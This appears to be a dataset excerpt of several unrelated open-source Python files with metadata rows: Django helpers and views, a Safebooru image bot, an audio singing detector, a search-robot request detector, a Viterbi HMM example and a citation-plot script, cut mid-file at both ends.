:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
"""
warnings.warn(
"manager_from is pending deprecation; use PassThroughManager instead.",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
| bsd-3-clause | 8,724,807,216,674,744,000 | 36.395556 | 103 | 0.611719 | false | 4.114425 | false | false | false |
ace3df/ImageTweet | plugins/safebooru.py | 1 | 9578 | # -*- coding: utf-8 -*-
import random
import time
import sys
import os
import re
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import utils
def delete_image(image):
import time
time.sleep(10)
os.remove(image)
def tag_clean(tag_html):
text = tag_html.text
text = text.rstrip('1234567890.')
text = text.replace("'", "\'").strip()
return text
def get_image_online(**kwargs):
if kwargs.get('used images'):
txt_name = kwargs.get('used images')
used_links = open(txt_name, 'r').read().splitlines()
else:
txt_name = os.path.join(os.getcwd(), "Used safebooru {0}.txt".format(
kwargs['bot name']))
try:
used_links = open(txt_name, 'r').read().splitlines()
except:
if not os.path.exists(txt_name):
print("Didn't find any used links! Creating a TXT!")
print("Set it to:\n{0}".format(txt_name))
used_links = []
else:
used_links = open(txt_name, 'r').read().splitlines()
if kwargs.get('highest page'):
high_page = int(kwargs.get('highest page'))
else:
high_page = 50
tried_pages = [high_page]
cookie_file = None
try_count = 0
low_page = 0
page = 0
x = None
no_images = False
url_start = "http://safebooru.org"
url_search = "http://safebooru.org/index.php?page=post&s=list&tags="
if utils.is_bool(kwargs.get('login')):
cookie_file = "../safebooru.txt"
url_login = url_start + "/index.php?page=account&s=login&code=00"
form_num = 0
form_user = "user"
form_password = "pass"
username = kwargs.get('username')
password = kwargs.get('password')
if not os.path.exists(cookie_file):
browser, s = utils.scrape_site(url_login, cookie_file, True)
form = browser.get_form(form_num)
form[form_user].value = username
form[form_password].value = password
browser.submit_form(form)
s.cookies.save()
if utils.is_bool(kwargs.get('save images')):
if kwargs.get('path'):
path = kwargs.get('path')
else:
path = os.path.abspath(os.path.join(os.getcwd(),
"images"))
if not os.path.exists(path):
os.makedirs(path)
else:
path = os.path.abspath(os.path.join(os.getcwd()))
if kwargs.get('tags'):
if isinstance(kwargs.get('tags'), list):
tags = '+'.join(kwargs.get('tags'))
else:
tags = '+'.join(kwargs.get('tags').split(', '))
else:
tags = ""
if kwargs.get('ignore tags'):
if isinstance(kwargs.get('ignore tags'), list):
ignore_tags = kwargs.get('ignore tags')
else:
ignore_tags = kwargs.get('ignore tags').split(', ')
else:
ignore_tags = []
if utils.is_bool(kwargs.get('ignore cosplay')):
ignore_cosplay = utils.is_bool(kwargs.get('ignore cosplay'))
else:
ignore_cosplay = False
if utils.is_bool(kwargs.get('accept webm')):
accept_webm = utils.is_bool(kwargs.get('accept webm'))
else:
accept_webm = False
tried_pages = [high_page + 41]
while True:
while True:
while True:
while True:
no_images = False
try_count += 1
if try_count == 15:
return False, False
page = str(int(random.randint(low_page, high_page) * 40))
while int(page) in tried_pages:
if int(page) == 0:
break
if not x:
x = high_page
page = str(int(
random.randint(low_page, high_page) * 1))
if int(page) > int(x):
continue
tried_pages.append(int(page))
x = min(tried_pages)
page_url = "&pid=" + str(page)
url = "%s%s%s" % (url_search, tags, page_url)
browser = utils.scrape_site(url, cookie_file)
if browser.find('h1', text="Nothing found, try google? "):
no_images = True
elif len(browser.find_all('img')) < 3:
no_images = True
time.sleep(1)
if not no_images:
break
elif no_images and int(page) == 0:
return False, False
good_image_links = []
image_links = browser.find_all('span', class_="thumb")
for link in image_links:
try:
link['id']
except:
continue
link = str(link['id'])[1:]
good_image_links.append(link)
if good_image_links == []:
return False, False
random.shuffle(good_image_links)
url = "%s/index.php?page=post&s=view&id=%s" % (
url_start, random.choice(good_image_links))
try_count = 0
while url in used_links:
url = "%s/index.php?page=post&s=view&id=%s" % (
url_start, random.choice(good_image_links))
try_count = try_count + 1
if try_count == 20:
break
used_links.append(url)
post_url = url
browser.open(url)
image_tags = []
char_tags = []
art_tags = []
sers_tags = []
tags_tags = []
site_tag = browser.find('ul', id="tag-sidebar")
site_tag = site_tag.find_all('li')
for taga in site_tag:
tag = tag_clean(taga)
if taga['class'][0] == "tag-type-artist":
art_tags.append(tag.title())
elif taga['class'][0] == "tag-type-copyright":
sers_tags.append(tag.title())
elif taga['class'][0] == "tag-type-character":
char_tags.append(tag.title())
else:
tags_tags.append(tag.title())
image_tags.append(tag.lower())
if any([item in [x.lower() for x in ignore_tags]
for item in [x.lower() for x in image_tags]]):
continue
if ignore_cosplay:
if any(" (cosplay)" in s for s in image_tags):
continue
break
filename = ""
if not utils.is_bool(kwargs.get('message')):
message = ""
try:
url = browser.find(
'img', attrs={'id': 'image'})['src'].replace("\\\\", "\\")
except:
# Flash file
continue
sn_kwgs = {}
sn_url, sn_kwgs = utils.saucenao(url, kwargs['saucenao api'], True)
re_dict = {'{#artist}': (
'#' if art_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in art_tags]),
'{#character}': (
'#' if char_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in char_tags]),
'{#series}': (
'#' if sers_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in sers_tags]),
'{#tags}': (
'#' if tags_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in tags_tags]),
'{artist}': ', '.join(art_tags),
'{character}': ', '.join(char_tags),
'{series}': ', '.join(sers_tags),
'{tags}': ', '.join(tags_tags),
'{url}': post_url,
'{sn title}': sn_kwgs.get('title'),
'{sn illust id}': sn_kwgs.get('illust id'),
'{sn illust url}': sn_url,
'{sn artist}': sn_kwgs.get('artist'),
'{sn artist id}': sn_kwgs.get('artist id'),
'{sn artist url}': sn_kwgs.get('artist url')}
if kwargs.get('filename'):
filename = utils.replace_all(kwargs.get('filename'), re_dict)
filename = utils.safe_msg(filename)
if kwargs.get('message'):
message = utils.replace_all(kwargs.get('message'), re_dict)
message = utils.safe_msg(message)
with open(txt_name, 'w') as f:
f.write("\n".join(used_links))
tweet_image = utils.download_image(url, path, filename, **kwargs)
if tweet_image:
break
if not utils.is_bool(kwargs.get('save images')):
from threading import Thread
Thread(name="Delete Image", target=delete_image, args=(
tweet_image, )).start()
return message, tweet_image
def main(**kwargs):
message, image = get_image_online(**kwargs)
return(message, image)
| mit | 392,481,504,197,402,100 | 37.934959 | 79 | 0.448423 | false | 4.12667 | false | false | false |
davebridges/mousedb | mousedb/veterinary/views.py | 1 | 7047 | '''This module generates the views for the veterinary app.
There is one generic home view for the entire app as well as detail, create update and delete views for these models:
* :class:`~mousedb.veterinary.models.MedicalIssue`
* :class:`~mousedb.veterinary.models.MedicalCondition`
* :class:`~mousedb.veterinary.models.MedicalTreatment`
'''
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.core.urlresolvers import reverse_lazy
from braces.views import LoginRequiredMixin, PermissionRequiredMixin
from mousedb.veterinary.models import MedicalIssue,MedicalCondition,MedicalTreatment
class VeterinaryHome(LoginRequiredMixin, TemplateView):
'''This view is the main page for the veterinary app.
This view contains links to all medical issues, conditions and treatments.
If this becomes too unwieldy over time, it might be necessary to limit medical_issues to the most recent few.'''
template_name = "veterinary_home.html"
def get_context_data(self, **kwargs):
'''Adds to the context all issues, conditions and treatments.'''
context = super(VeterinaryHome, self).get_context_data(**kwargs)
context['medical_issues'] = MedicalIssue.objects.all()
context['medical_conditions'] = MedicalCondition.objects.all()
context['medical_treatments'] = MedicalTreatment.objects.all()
return context
class MedicalIssueDetail(LoginRequiredMixin, DetailView):
'''This view is for details of a particular :class:`~mousedb.veterinary.MedicalIssue`.
It passes an object **medical_issue** when the url **/veterinary/medical-issue/<pk#>** is requested.'''
model = MedicalIssue
context_object_name = 'medical_issue'
template_name = 'medical_issue_detail.html'
class MedicalIssueCreate(PermissionRequiredMixin, CreateView):
'''This view is for creating a new :class:`~mousedb.veterinary.MedicalIssue`.
It requires the permissions to create a new medical issue and is found at the url **/veterinary/medical-issue/new**.'''
permission_required = 'veterinary.create_medicalissue'
model = MedicalIssue
fields = '__all__'
template_name = 'medical_issue_form.html'
class MedicalIssueUpdate(PermissionRequiredMixin, UpdateView):
'''This view is for updating a :class:`~mousedb.veterinary.MedicalIssue`.
It requires the permissions to update a medical issue and is found at the url **/veterinary/medical-issue/<pk$>/edit**.'''
permission_required = 'veterinary.update_medicalissue'
model = MedicalIssue
fields = '__all__'
context_object_name = 'medical_issue'
template_name = 'medical_issue_form.html'
class MedicalIssueDelete(PermissionRequiredMixin, DeleteView):
'''This view is for deleting a :class:`~mousedb.veterinary.MedicalIssue`.
It requires the permissions to delete a medical issue and is found at the url **/veterinary/medical-issue/<pk$>/delete**.'''
permission_required = 'veterinary.delete_medicalissue'
model = MedicalIssue
template_name = 'confirm_delete.html'
success_url = reverse_lazy('veterinary-home')
class MedicalConditionDetail(LoginRequiredMixin, DetailView):
'''This view is for details of a particular :class:`~mousedb.veterinary.MedicalCondition`.
It passes an object **medical_condition** when the url **/veterinary/medical-condition/<slug>** is requested.'''
model = MedicalCondition
context_object_name = 'medical_condition'
template_name = 'medical_condition_detail.html'
class MedicalConditionCreate(PermissionRequiredMixin, CreateView):
'''This view is for creating a new :class:`~mousedb.veterinary.MedicalCondition`.
It requires the permissions to create a new medical issue and is found at the url **/veterinary/medical-condition/new**.'''
permission_required = 'veterinary.create_medicalcondition'
model = MedicalCondition
fields = '__all__'
template_name = 'medical_condition_form.html'
class MedicalConditionUpdate(PermissionRequiredMixin, UpdateView):
'''This view is for updating a :class:`~mousedb.veterinary.MedicalCondition`.
It requires the permissions to update a medical issue and is found at the url **/veterinary/medical-condition/<slug>/edit**.'''
permission_required = 'veterinary.update_medicalcondition'
model = MedicalCondition
fields = '__all__'
context_object_name = 'medical_condition'
template_name = 'medical_condition_form.html'
class MedicalConditionDelete(PermissionRequiredMixin, DeleteView):
'''This view is for deleting a :class:`~mousedb.veterinary.MedicalCondition`.
It requires the permissions to delete a medical issue and is found at the url **/veterinary/medical-condition/<slug>/delete**.'''
permission_required = 'veterinary.delete_medicalcondition'
model = MedicalCondition
template_name = 'confirm_delete.html'
success_url = reverse_lazy('veterinary-home')
class MedicalTreatmentDetail(LoginRequiredMixin, DetailView):
'''This view is for details of a particular :class:`~mousedb.veterinary.MedicalTreatment`.
It passes an object **medical_treatment** when the url **/veterinary/medical-treatment/<slug>** is requested.'''
model = MedicalTreatment
context_object_name = 'medical_treatment'
template_name = 'medical_treatment_detail.html'
class MedicalTreatmentCreate(PermissionRequiredMixin, CreateView):
'''This view is for creating a new :class:`~mousedb.veterinary.MedicalTreatment`.
It requires the permissions to create a new medical issue and is found at the url **/veterinary/medical-treatment/new**.'''
permission_required = 'veterinary.create_medicaltreatment'
model = MedicalTreatment
fields = '__all__'
template_name = 'medical_treatment_form.html'
class MedicalTreatmentUpdate(PermissionRequiredMixin, UpdateView):
'''This view is for updating a :class:`~mousedb.veterinary.MedicalTreatment`.
It requires the permissions to update a medical issue and is found at the url **/veterinary/medical-treatment/<slug>/edit**.'''
permission_required = 'veterinary.update_medicaltreatment'
model = MedicalTreatment
fields = '__all__'
context_object_name = 'medical_treatment'
template_name = 'medical_treatment_form.html'
class MedicalTreatmentDelete(PermissionRequiredMixin, DeleteView):
'''This view is for deleting a :class:`~mousedb.veterinary.MedicalTreatment`.
It requires the permissions to delete a medical issue and is found at the url **/veterinary/medical-treatment/<slug>/delete**.'''
permission_required = 'veterinary.delete_medicaltreatment'
model = MedicalTreatment
template_name = 'confirm_delete.html'
success_url = reverse_lazy('veterinary-home')
| bsd-3-clause | 775,855,840,487,166,100 | 44.75974 | 133 | 0.724847 | false | 3.782609 | false | false | false |
ANR-DIADEMS/timeside-diadems | timeside/plugins/diadems/irit_singings.py | 1 | 7234 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2013 Maxime Le Coz <[email protected]>
# This file is part of TimeSide.
# TimeSide is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# TimeSide is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with TimeSide. If not, see <http://www.gnu.org/licenses/>.
# Author: Maxime Le Coz <[email protected]>
from timeside.core import implements, interfacedoc
from timeside.core.analyzer import Analyzer, IAnalyzer
from timeside.plugins.diadems.irit_monopoly import IRITMonopoly
from timeside.plugins.diadems.irit_harmo_tracking import IRITHarmoTracker
from timeside.core.preprocessors import frames_adapter
from numpy import median, mean, linspace, argmin, argmax, array
from numpy.fft import rfft
from collections import Counter
class IRITSinging(Analyzer):
implements(IAnalyzer)
def __init__(self):
super(IRITSinging, self).__init__()
self.parents['irit_monopoly'] = IRITMonopoly()
self.parents['irit_harmo_tracking'] = IRITHarmoTracker()
self.thPoly = 0.15
self.thMono = 0.1
@interfacedoc
def setup(self, channels=None, samplerate=None, blocksize=None,
totalframes=None):
super(IRITSinging, self).setup(
channels, samplerate, blocksize, totalframes)
@staticmethod
@interfacedoc
def id():
return "irit_singing"
@staticmethod
@interfacedoc
def name():
return "IRIT Singings detection"
@staticmethod
@interfacedoc
def unit():
return ""
def __str__(self):
return "Singings segments"
@frames_adapter
def process(self, frames, eod=False):
return frames, eod
def post_process(self):
"""
:return:
"""
trackings = self.parents['irit_harmo_tracking'].results['irit_harmo_tracking']['data_object']["value"]
tr = sorted(trackings[0].nodes, key=lambda x: x.time)
tr_frame_rate = 1.0 / float(tr[1].time - tr[0].time)
pitch = self.parents['irit_monopoly'].results['irit_monopoly.pitch']['data_object']["value"]
segments_monopoly = self.parents['irit_monopoly'].results['irit_monopoly.segments']['data_object']
segments_monopoly = [(start, start + dur, label == 1) for start, dur, label in
zip(segments_monopoly["time"], segments_monopoly["duration"], segments_monopoly["label"])]
segments_chant = []
f0_frame_rate = 1.0 / float(pitch[1][0] - pitch[0][0])
for start, stop, label in segments_monopoly:
cumulChant = 0
# Attention aux changements de labels ...
if label:
segs = split_notes(extract_pitch(pitch, start, stop), f0_frame_rate)
for seg in segs:
if has_vibrato(seg[2], f0_frame_rate):
cumulChant += seg[1] - seg[0]
segments_chant += [(start, stop, cumulChant / (stop - start) >= self.thMono)]
else:
for start, stop, value in extended_vibrato(trackings, tr_frame_rate):
segments_chant += [(start, stop, value >= self.thPoly)]
label = {1: "Singing", 0: "Non Singing"}
segs = self.new_result(data_mode='label', time_mode='segment')
segs.id_metadata.id += '.' + 'segments'
segs.id_metadata.name += ' ' + 'Segments'
segs.data_object.label_metadata.label = label
segs.data_object.time = array([s[0] for s in segments_chant])
segs.data_object.duration = array([s[1] - s[0] for s in segments_chant])
segs.data_object.label = array([int(s[2]) for s in segments_chant])
self.add_result(segs)
def extended_vibrato(trackings, spectrogram_sampling_rate, number_of_extrema_for_rupture=3):
"""
Detection de vibrato en contexte polyphonique
"""
extremums = [s.start for s in trackings] + [s.stop for s in trackings]
last = max(extremums)
counter = Counter(extremums)
ruptures = [0] + sorted([time for time in counter if counter[time] >= number_of_extrema_for_rupture]) + [last]
scores = []
for i, rupture in enumerate(ruptures[:-1]):
sum_present = 0.0
sum_vibrato = 0.0
for s in trackings:
frequencies = s.get_portion(rupture, ruptures[i + 1])
if len(frequencies) > 0.05 * spectrogram_sampling_rate:
sum_present += len(frequencies)
if has_vibrato(frequencies, spectrogram_sampling_rate):
sum_vibrato += len(frequencies)
if sum_present > 0:
scores += [(rupture, ruptures[i + 1], sum_vibrato / sum_present)]
return scores
def extract_pitch(pitch, start, stop):
return [p for t, p in pitch if start <= t <= stop]
def smoothing(data, number_of_points=3, smoothing_function=mean):
"""
"""
w = number_of_points / 2
return [0.0] * w + [smoothing_function(data[i - w:i + w]) for i in range(w, len(data) - w)] + [0.0] * w
def split_notes(f0, f0_sample_rate, minimum_segment_length=0.0):
"""
Découpage en pseudo-notes en fonction de la fréquence fondamentale.
Retourne la liste des segments en secondes
"""
f0 = smoothing(f0, number_of_points=5, smoothing_function=median)
half_tone_ratio = 2**(1.0 / 12.0)
minimum_segment_length = minimum_segment_length / f0_sample_rate
ratios = [max([y1, y2]) / min([y1, y2]) if min([y1, y2]) > 0 else 0 for y1, y2 in zip(f0[:-2], f0[1:])]
boundaries = [0] + [i + 1 for i, ratio in enumerate(ratios) if ratio > half_tone_ratio]
return [(start * f0_sample_rate, stop * f0_sample_rate, f0[start:stop])
for start, stop in zip(boundaries[:-2], boundaries[1:]) if stop - start > minimum_segment_length]
def has_vibrato(serie, sampling_rate, minimum_frequency=4, maximum_frequency=8, Nfft=100):
"""
Calcul de vibrato sur une serie par la méthode de la transformée de Fourier de la dérivée.
"""
vibrato = False
frequency_scale = linspace(0, sampling_rate / 2, Nfft / 2)
index_min_vibrato = argmin(abs(frequency_scale - minimum_frequency))
index_max_vibrato = argmin(abs(frequency_scale - maximum_frequency))
derivative = [v1 - v2 for v1, v2 in zip(serie[:-2], serie[1:])]
fft_derivative = abs(rfft(derivative, Nfft))[:Nfft / 2]
i_max = argmax(fft_derivative)
if index_max_vibrato >= i_max >= index_min_vibrato:
vibrato = True
return vibrato
# Generate Grapher for IRITSinging analyzer
from timeside.core.grapher import DisplayAnalyzer
DisplayIritSinging = DisplayAnalyzer.create(
analyzer=IRITSinging,
result_id='irit_singing.segments',
grapher_id='grapher_irit_singing_segments',
grapher_name='Singings detection',
background='waveform',
staging=True)
| gpl-2.0 | -1,683,434,666,844,066,000 | 35.14 | 119 | 0.639734 | false | 3.301964 | false | false | false |
SnapSearch/SnapSearch-Client-Python | src/SnapSearch/detector.py | 1 | 11166 | # -*- coding: utf-8 -*-
"""
SnapSearch.detector
~~~~~~~~~~~~~~~~~~~
:copyright: 2014 by `SnapSearch <https://snapsearch.io/>`_
:license: MIT, see LICENSE for more details.
:author: `LIU Yu <[email protected]>`_
:date: 2014/03/08
"""
# future import should come first
from __future__ import with_statement
__all__ = ['Detector', ]
import json
import os
import re
import sys
import SnapSearch.api as api
import SnapSearch.error as error
from ._compat import u
class Detector(object):
"""
Detects if the incoming HTTP request a) came from a search engine robot
and b) is eligible for interception. The ``Detector`` inspects the
following aspects of the incoming HTTP request:
1. if the request uses HTTP or HTTPS protocol
2. if the request uses HTTP ``GET`` method
3. if the request is *not* from any ignored user agenets
(ignored robots take precedence over matched robots)
4. if the request is accessing any route *not* matching the whitelist
5. if the request is *not* accessing any route matching the blacklist
6. if the request is *not* accessing any resource with an invalid
file extension
7. if the request has ``_escaped_fragment_`` query parameter
8. if the request is from any matched user agents
"""
@property
def robots(self):
"""
``dict`` of ``list``'s of user agents from search engine robots:
.. code-block:: json
{
"ignore": [
# user agents to be ignored
]
"match": [
# user agents to be matched
]
}
Can be changed to customize ignored and matched search engine robots.
The ``ignore`` list takes precedence over the ``match`` list.
"""
return self.__robots
@property
def extensions(self):
"""
``dict`` of ``list``'s of valid file extensions:
.. code-block:: json
{
"generic": [
# valid generic extensions
],
"python": [
# valid python extensions
]
}
Can be changed to customize valid file extensions.
"""
return self.__extensions
# private properties
__slots__ = ['__check_file_extensions', '__extensions', '__ignored_routes',
'__matched_routes', '__robots', ]
def __init__(self,
ignored_routes=[],
matched_routes=[],
check_file_extensions=False,
robots_json=None,
extensions_json=None):
"""
Optional arguments:
:param ignored_routes: blacklisted route regular expressions.
:type ignored_routes: ``list`` or ``tuple``
:param matched_routes: whitelisted route regular expressions.
:type matched_routes: ``list`` or ``tuple``
:param check_file_extensions: to check if the URL is going to a static
file resource that should not be intercepted.
:type check_file_extensions: ``bool``
:param robots_json: absolute path to an external ``robots.json`` file.
:param extensions_json: absolute path to an external
``extensions.json`` file.
:raises AssertionError: if ``extensions.json`` is specified, yet
``check_file_extensions`` is ``False``.
"""
self.__ignored_routes = set(ignored_routes)
self.__matched_routes = set(matched_routes)
# ``extensions.json`` is specified, yet do not require checking file
# extensions. this probably means a mistake.
assert(not (not check_file_extensions and extensions_json)), \
"specified ``extensions_json`` " \
"yet ``check_file_extensions`` is false"
self.__check_file_extensions = check_file_extensions
# json.load() may raise IOError, TypeError, or ValueError
with open(robots_json or api.DEFAULT_ROBOTS_JSON) as f:
self.__robots = json.load(f)
f.close()
# same as above
with open(extensions_json or api.DEFAULT_EXTENSIONS_JSON) as f:
self.__extensions = json.load(f)
f.close()
pass # void return
def __call__(self, request):
"""
:param request: incoming HTTP request.
:type request: ``dict``
:returns: :RFC:`3986` percent-encoded full URL if the incoming HTTP
request is eligible for interception, or ``None`` otherwise.
:raises error.SnapSearchError: if the structure of either
``robots.json`` or ``extensions.json`` is invalid.
"""
# wrap the incoming HTTP request (CGI-style environ)
environ = api.AnyEnv(request)
# do not intercept protocols other than HTTP and HTTPS
if environ.scheme not in ("http", "https", ):
return None
# do not intercept HTTP methods other than GET
if environ.method not in ("GET", ):
return None
# user agent may not exist in the HTTP request
user_agent = environ.user_agent
# request uri with query string
real_path = environ.path_qs
# validate ``robots`` since it can be altered from outside
if not self._validate_robots():
raise error.SnapSearchError(
"structure of ``robots`` is invalid")
# do not intercept requests from ignored robots
ignore_regex = u("|").join(
[re.escape(tok) for tok in self.robots.get('ignore', [])])
if re.search(ignore_regex, user_agent, re.I | re.U):
return None
# do not intercept if there exist whitelisted route(s) (matched_routes)
# and that the requested route **does not** match any one of them.
if self.__matched_routes:
found = False
for route in self.__matched_routes:
route_regex = u(route)
if re.search(route_regex, real_path, re.I | re.U):
found = True
break
if not found:
return None
# do not intercept if there exist blacklisted route(s) (ignored_routes)
# and that the requested route **does** matches one of them.
if self.__ignored_routes:
for route in self.__ignored_routes:
route_regex = u(route)
if re.search(route_regex, real_path, re.I | re.U):
return None
# detect extensions in order to prevent direct requests to static files
if self.__check_file_extensions:
# validate ``extensions`` since it can be altered from outside
if not self._validate_extensions():
raise error.SnapSearchError(
"structure of ``extensions`` is invalid")
# create a set of file extensions common for HTML resources
valid_extensions = set(
[s.lower() for s in self.extensions.get('generic', [])])
valid_extensions.update(
[s.lower() for s in self.extensions.get('python', [])])
# file extension regex. it looks for "/{file}.{ext}" in an URL that
# is not preceded by '?' (query parameters) or '#' (hash fragment).
# it will acquire the last extension that is present in the URL so
# with "/{file1}.{ext1}/{file2}.{ext2}" the ext2 will be the
# matched extension. furthermore if a file has multiple extensions
# "/{file}.{ext1}.{ext2}", it will only match extension2 because
# unix systems don't consider extensions to be metadata, and
# windows only considers the last extension to be valid metadata.
# Basically the {file}.{ext1} could actually just be the filename.
extension_regex = u(r"""
^ # start of the string
(?: # begin non-capturing group
(?! # begin negative lookahead
[?#] # question mark '?' or hash '#'
.* # zero or more wildcard characters
/ # literal slash '/'
[^/?#]+ # {file} - has one or more of any character
# except '/', '?' or '#'
\. # literal dot '.'
[^/?#]+ # {extension} - has one or more of any character
# except '/', '?' or '#'
) # end negative lookahead (prevents any '?' or
# '#' that precedes {file}.{extension} by
# any characters)
. # one wildcard character
)* # end non-capturing group (captures any number
# of wildcard characters that passes the
# negative lookahead)
/ # literal slash '/'
[^/?#]+ # {file} - has one or more of any character
# except forward slash, question mark or hash
\. # literal dot '.'
([^/?#]+) # {extension} - subgroup has one or more of any
# character except '/', '?' or '#'
""")
# match extension regex against decoded path
matches = re.match(extension_regex, real_path, re.U | re.X)
if matches:
url_extension = matches.group(1).lower()
if url_extension not in valid_extensions:
return None
# detect escaped fragment (since the ignored user agents has already
# been detected, SnapSearch won't continue the interception loop)
if "_escaped_fragment_" in environ.GET:
return environ.url
# intercept requests from matched robots
matched_regex = u("|").join(
[re.escape(tok) for tok in self.robots.get('match', [])])
if re.search(matched_regex, user_agent, re.I | re.U):
return environ.url
# do not intercept if no match at all
return None
def _validate_robots(self):
# ``robots`` should be a ``dict`` object, if keys ``ignore`` and
# ``match`` exist, the respective values must be ``list`` objects.
return isinstance(self.robots, dict) and \
isinstance(self.robots.get('ignore', []), list) and \
isinstance(self.robots.get('match', []), list)
def _validate_extensions(self):
# ``extensions`` should be a ``dict`` object, if keys ``generic`` and
# ``python`` exist, the respective values must be ``list`` objects.
return isinstance(self.extensions, dict) and \
isinstance(self.extensions.get('generic', []), list) and \
isinstance(self.extensions.get('python', []), list)
pass
| mit | 7,516,432,823,431,704,000 | 38.178947 | 79 | 0.543346 | false | 4.695542 | false | false | false |
afodor/pythonExamples | src/viterbi/viterbiExample.py | 1 | 2894 | import random
class MarkovState:
def __init__(self,charsToEmit, emissionProbs,transitionProbs):
self.charsToEmit = charsToEmit
self.emissionProbs = emissionProbs
self.transitionProbs = transitionProbs
def getEmissionIndex(self):
aRand = random.random()
cumulative = 0
index =0
for val in self.emissionProbs:
cumulative += val
if aRand <= cumulative:
return index
index = index + 1
return len(self.emissionProbs) - 1
def getIndexOfEmission(self, char):
for i in range(0, len(self.charsToEmit) ):
if str(self.charsToEmit[i]) == str(char):
return i
raise Exception("Cound not find " + str(char) )
def getTransitionIndex(self):
aRand = random.random()
cumulative = 0
index =0
for val in self.transitionProbs:
cumulative += val
if aRand <= cumulative:
return index
index = index + 1
return len(self.transitionProbs) - 1
def getMaxIndex( iterable ):
val = iterable[0]
index =0
returnVal =0
for i in iterable:
if i > val:
returnVal = index
index = index+1
return returnVal
def getViterbiPath( markovStates, output):
returnPath= []
oldViterbiProbs = []
oldViterbiProbs.append(1) # we are 100% sure we start in the first state
for i in range( 1, len(markovStates) ):
oldViterbiProbs.append( 0)
aTuple = ( oldViterbiProbs, 0)
returnPath.append( aTuple )
for i in range( 0,len(output)):
newViterbiProbs = []
for j in range( 0, len(markovStates)):
state = markovStates[j]
emissionProb = state.emissionProbs[state.getIndexOfEmission(output[i])]
vTimesA=[]
for k in range(0, len(markovStates)):
vTimesA.append (oldViterbiProbs[k] * markovStates[k].transitionProbs[j])
#print( "vTimesA" + str( vTimesA))
maxVal = vTimesA[ getMaxIndex(vTimesA) ]
newViterbiProbs.append( emissionProb * maxVal)
aTuple = (newViterbiProbs,getMaxIndex(newViterbiProbs))
returnPath.append( aTuple)
oldViterbiProbs = newViterbiProbs
return returnPath
dice = ( 1,2,3,4,5,6 )
fairState = MarkovState( dice, (1/6,1/6,1/6,1/6,1/6,1/6), ( 0.95, 0.05) )
loadedState = MarkovState( dice, (1/10,1/10,1/10,1/10,1/10,5/10), ( 0.10, 0.90) )
states = ( fairState, loadedState )
################################################
rolls = "266666"
getViterbiPath( states, rolls)
################################################
rolls = ""
trueStates = ""
state = states[0]
for i in range( 1, 100):
nextState = state.getTransitionIndex()
state = states[ nextState]
trueStates = trueStates + str(nextState)
rolls = rolls + str( dice[ state.getEmissionIndex()] )
rolls
trueStates
viterbiPath = getViterbiPath( states, rolls)
for i in range(0, len(rolls)):
print( str(rolls[i]) + " " + str(trueStates[i])+ " " + str(viterbiPath[i][1]))
################################################
| gpl-2.0 | 38,707,374,708,130,250 | 25.561905 | 81 | 0.630615 | false | 2.817916 | false | false | false |
salazardetroya/libmesh | doc/statistics/libmesh_citations.py | 1 | 2340 | #!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
# Number of "papers using libmesh" by year.
#
# Note 1: this does not count citations "only," the authors must have actually
# used libmesh in part of their work. Therefore, these counts do not include
# things like Wolfgang citing us in his papers to show how Deal.II is
# superior...
#
# Note 2: I typically update this data after regenerating the web page,
# since bibtex2html renumbers the references starting from "1" each year.
#
# Note 3: These citations include anything that is not a dissertation/thesis.
# So, some are conference papers, some are journal articles, etc.
#
# Note 4: The libmesh paper came out in 2006, but there are some citations
# prior to that date, obviously. These counts include citations of the
# website libmesh.sf.net as well...
#
# Note 5: Preprints are listed as the "current year + 1" and are constantly
# being moved to their respective years after being published.
data = [
'2004', 5,
'\'05', 2,
'\'06', 13,
'\'07', 8,
'\'08', 23,
'\'09', 30,
'\'10', 24,
'\'11', 37,
'\'12', 50,
'\'13', 78,
'\'14', 60,
'\'15', 11,
'P', 8, # Preprints
'T', 36 # Theses
]
# Extract the x-axis labels from the data array
xlabels = data[0::2]
# Extract the publication counts from the data array
n_papers = data[1::2]
# The number of data points
N = len(xlabels);
# Get a reference to the figure
fig = plt.figure()
# 111 is equivalent to Matlab's subplot(1,1,1) command
ax = fig.add_subplot(111)
# Create an x-axis for plotting
x = np.linspace(1, N, N)
# Width of the bars
width = 0.8
# Make the bar chart. Plot years in blue, preprints and theses in green.
ax.bar(x[0:N-2], n_papers[0:N-2], width, color='b')
ax.bar(x[N-2:N], n_papers[N-2:N], width, color='g')
# Label the x-axis
